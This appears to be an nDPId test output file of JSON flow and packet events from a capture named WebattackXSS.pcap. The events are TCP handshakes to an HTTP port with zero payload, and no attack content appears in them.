+00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":8133,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":500,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347815351,"flow_last_seen":1499347820846,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347947010,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":32988,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":8133,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":500,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347815351,"flow_last_seen":1499347820846,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347947010,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":32988,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":8133,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":501,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347816657,"flow_last_seen":1499347821846,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347947010,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":33002,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":8133,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":501,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347816657,"flow_last_seen":1499347821846,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347947010,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":33002,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":8133,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":502,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347819250,"flow_last_seen":1499347824846,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347947010,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":33028,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":8133,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":502,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347819250,"flow_last_seen":1499347824846,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347947010,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":33028,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":8133,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":503,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347820510,"flow_last_seen":1499347825848,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347947010,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":33042,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":8133,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":503,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347820510,"flow_last_seen":1499347825848,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347947010,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":33042,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":8136,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":574,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347948293,"flow_last_seen":1499347948293,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347948293,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34372,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8136,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":574,"flow_packet_id":1,"flow_last_seen":1499347948293,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347948293,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8EvlAAD4GstesEAABwKgKMoZEAFDGn7d3AAAAAKACchCzjQAAAgQFtAQCCAoBPKWOAAAAAAEDAwc="} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8137,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":574,"flow_packet_id":2,"flow_last_seen":1499347948293,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347948293,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQhkRGWOs1xp+3eKAScSAH9gAAAgQFtAQCCAoD5ncCATyljgEDAwc="} +00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8138,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":574,"flow_packet_id":3,"flow_last_seen":1499347948294,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347948294,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0EvpAAD4Gst6sEAABwKgKMoZEAFDGn7d4RljrNoAQAOWm\/QAAAQEICgE8pY4D5ncC"} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":8148,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":575,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347949587,"flow_last_seen":1499347949587,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347949587,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34386,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8148,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":575,"flow_packet_id":1,"flow_last_seen":1499347949587,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347949587,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8QMNAAD4GhQ2sEAABwKgKMoZSAFBj7eYSAAAAAKACchDmUwAAAgQFtAQCCAoBPKbRAAAAAAEDAwc="} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8149,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":575,"flow_packet_id":2,"flow_last_seen":1499347949587,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347949587,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQhlIJuXRqY+3mE6AScSDs4gAAAgQFtAQCCAoD5nhGATym0QEDAwc="} +00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8150,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":575,"flow_packet_id":3,"flow_last_seen":1499347949587,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347949587,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0QMRAAD4GhRSsEAABwKgKMoZSAFBj7eYTCbl0a4AQAOWL6QAAAQEICgE8ptID5nhG"} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":8169,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":576,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347952161,"flow_last_seen":1499347952161,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347952161,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34412,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8169,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":576,"flow_packet_id":1,"flow_last_seen":1499347952161,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347952161,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8St5AAD4GevKsEAABwKgKMoZsAFCk\/OOLAAAAAKACchClLQAAAgQFtAQCCAoBPKlVAAAAAAEDAwc="} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8170,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":576,"flow_packet_id":2,"flow_last_seen":1499347952161,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347952161,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQhmwNHcNepPzjjKAScSBW4QAAAgQFtAQCCAoD5nrJATypVQEDAwc="} +00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8171,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":576,"flow_packet_id":3,"flow_last_seen":1499347952162,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347952162,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0St9AAD4GevmsEAABwKgKMoZsAFCk\/OOMDR3DX4AQAOX16AAAAQEICgE8qVUD5nrJ"} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":8178,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":577,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347953439,"flow_last_seen":1499347953439,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347953439,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34426,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8178,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":577,"flow_packet_id":1,"flow_last_seen":1499347953439,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347953439,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8+l9AAD4Gy3CsEAABwKgKMoZ6AFBhTFDKAAAAAKACchB6UQAAAgQFtAQCCAoBPKqVAAAAAAEDAwc="} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8179,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":577,"flow_packet_id":2,"flow_last_seen":1499347953439,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347953439,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQhnpvVsdUYUxQy6AScSDElQAAAgQFtAQCCAoD5nwJATyqlQEDAwc="} +00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8180,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":577,"flow_packet_id":3,"flow_last_seen":1499347953440,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347953440,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0+mBAAD4Gy3esEAABwKgKMoZ6AFBhTFDLb1bHVYAQAOVjnQAAAQEICgE8qpUD5nwJ"} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":8190,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":578,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347954738,"flow_last_seen":1499347954738,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347954738,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34440,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8190,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":578,"flow_packet_id":1,"flow_last_seen":1499347954738,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347954738,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8a+xAAD4GWeSsEAABwKgKMoaIAFCY\/8A1AAAAAKACchDR4AAAAgQFtAQCCAoBPKvZAAAAAAEDAwc="} +00489{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8191,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":578,"flow_packet_id":2,"flow_last_seen":1499347954738,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347954738,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQhoh\/\/ieLmP\/ANqAScSCqAQAAAgQFtAQCCAoD5n1OATyr2QEDAwc="} +00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8192,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":578,"flow_packet_id":3,"flow_last_seen":1499347954739,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347954739,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0a+1AAD4GWeusEAABwKgKMoaIAFCY\/8A2f\/4njIAQAOVJCAAAAQEICgE8q9oD5n1O"} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":8208,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":579,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347957282,"flow_last_seen":1499347957282,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347957282,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34466,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8208,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":579,"flow_packet_id":1,"flow_last_seen":1499347957282,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347957282,"pkt":"ABm5CmnxAMGxFOsxCABFAAA82nJAAD4G612sEAABwKgKMoaiAFCv93QkAAAAAKACchAEYwAAAgQFtAQCCAoBPK5WAAAAAAEDAwc="} +00488{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8209,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":579,"flow_packet_id":2,"flow_last_seen":1499347957283,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347957283,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQhqLwUjy4r\/d0JaAScSBUhgAAAgQFtAQCCAoD5n\/KATyuVgEDAwc="} +00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8210,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":579,"flow_packet_id":3,"flow_last_seen":1499347957283,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347957283,"pkt":"ABm5CmnxAMGxFOsxCABFAAA02nNAAD4G62SsEAABwKgKMoaiAFCv93Ql8FI8uYAQAOXzjQAAAQEICgE8rlYD5n\/K"} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":8217,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":504,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1499347823117,"flow_last_seen":1499347828846,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347957887,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":33068,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":8217,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":504,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1499347823117,"flow_last_seen":1499347828846,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347957887,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":33068,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":8217,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":505,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347824426,"flow_last_seen":1499347829847,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347957887,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":33082,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":8217,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":505,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347824426,"flow_last_seen":1499347829847,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347957887,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":33082,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":8217,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":506,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347825732,"flow_last_seen":1499347830847,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347957887,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":33096,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":8217,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":506,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347825732,"flow_last_seen":1499347830847,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347957887,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":33096,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":8217,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":507,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347828369,"flow_last_seen":1499347833848,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347957887,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":33122,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":8217,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":507,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347828369,"flow_last_seen":1499347833848,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347957887,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":33122,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":8217,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":508,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347829667,"flow_last_seen":1499347834848,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347957887,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":33136,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":8217,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":508,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347829667,"flow_last_seen":1499347834848,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347957887,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":33136,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":8217,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":509,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347832201,"flow_last_seen":1499347837849,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347957887,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":33162,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":8217,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":509,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347832201,"flow_last_seen":1499347837849,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347957887,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":33162,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":8221,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":580,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347958588,"flow_last_seen":1499347958588,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347958588,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34480,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8221,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":580,"flow_packet_id":1,"flow_last_seen":1499347958588,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347958588,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8iDdAAD4GPZmsEAABwKgKMoawAFCTxierAAAAAKACchBruQAAAgQFtAQCCAoBPK+cAAAAAAEDAwc="} 